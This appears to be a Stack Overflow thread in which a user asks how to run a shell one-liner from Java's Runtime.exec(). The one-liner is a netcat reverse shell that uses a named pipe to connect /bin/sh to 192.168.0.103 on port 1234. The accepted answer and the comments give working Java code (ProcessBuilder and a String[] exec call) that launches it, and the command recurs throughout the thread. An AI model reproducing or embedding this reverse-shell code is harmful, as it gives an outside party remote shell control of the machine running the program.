# java Runtime.getRuntime().exec() unable to run commands

Tags: java, linux, bash, runtime.exec

I need to run the following command from inside the Runtime.getRuntime().exec():

```
rm /tmp/backpipe; mkfifo /tmp/backpipe && /bin/sh 0</tmp/backpipe | nc 192.168.0.103 1234 1>/tmp/backpipe
```

In what format should I pass it to my running java program that has the line :

```
Process localProcess = Runtime.getRuntime().exec(myStr);
```

where myStr is the entire command above that I want to execute ?

Things I have already tried :

```
[\"/bin/bash\",\"-c\",\"rm /tmp/backpipe;/usr/bin/mkfifo /tmp/backpipe && /bin/sh 0</tmp/backpipe | nc 192.168.0.103 1234 1>/tmp/backpipe\"] as String[]"
```

gives me the error :

> Cannot run program "["/bin/bash","-c","/usr/bin/mkfifo": error=2, No such file or directory

If I simply run the command from my terminal as :

```
rm /tmp/backpipe; mkfifo /tmp/backpipe && /bin/sh 0</tmp/backpipe | nc 192.168.0.103 1234 1>/tmp/backpipe
```

It runs like a charm, but not through the runtime.exec().

Answer (score 6, accepted):

Try to use `ProcessBuilder` instead of `Runtime`.

Try this one:

```
Process p = new ProcessBuilder().command("bash","-c",cmd).start();
```

`cmd` is the variable which holds your shell command.

---

**Update:**

```
String[] cmd = {"bash","-c", "rm -f /tmp/backpipe; mkfifo /tmp/backpipe && /bin/sh 0</tmp/backpipe | nc 192.168.0.103 1234 1>/tmp/backpipe"}; // type last element your command
Process p = Runtime.getRuntime().exec(cmd);
```

Comment: Is there a way to do it without using ProcessBuilder and using Runtime itself as asked above ?

Comment: @geek_ji use `Process p = Runtime.getRuntime().exec("bash -c " + cmd);` I think it should work. I didn't check as I don't have my pc right now.

Comment: @geek_ji did you use `"bash -c"` or `"bash -c "`? Without space it won't work.

Comment: i used "bash -c rm -f /tmp/backpipe; mkfifo /tmp/backpipe && /bin/sh 0</tmp/backpipe | nc 192.168.0.103 1234 1>/tmp/backpipe"

Comment: So this is how I am doing it now :
String str4 = "\"\\bin\\bash -c \" + \"rm -f /tmp/backpipe; mkfifo /tmp/backpipe && /bin/sh 0</tmp/backpipe | nc 192.168.0.103 1234 1>/tmp/backpipe\"";
         Process localProcess = Runtime.getRuntime().exec(str4);

And I still get the same error :

Comment: @geek_ji check out updated answer. And I think there is no need for backslash to indicate space in `bash -c ....` You should only use "backslash" to indicate space in the file names or folders

Answer (score 0):

Here is working Java code that illustrates few more aspects of calling [Runtime.getRuntime().exec()](https://docs.oracle.com/javase/7/docs/api/java/lang/Runtime.html#exec(java.lang.String)) like waiting for the process to complete and capturing the output and error streams:

```
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.BufferedReader;

class Test {
    public static void dump(InputStream is) {
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        String line;

        try {
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
        } catch (Exception e) {
            System.out.println("read line threw exception");
        }
    }
    public static void run(String cmd) {
        try {
                Process p = Runtime.getRuntime().exec(cmd);
                p.waitFor();
                int status = p.exitValue();
                System.out.println("Program terminated with exit status " + status);

                if (status != 0) {
                    dump(p.getErrorStream());
                }
                else {
                    dump(p.getInputStream());
                }
            } catch (Exception e) {
                System.out.println("Caught exception");
        }
    }
};
```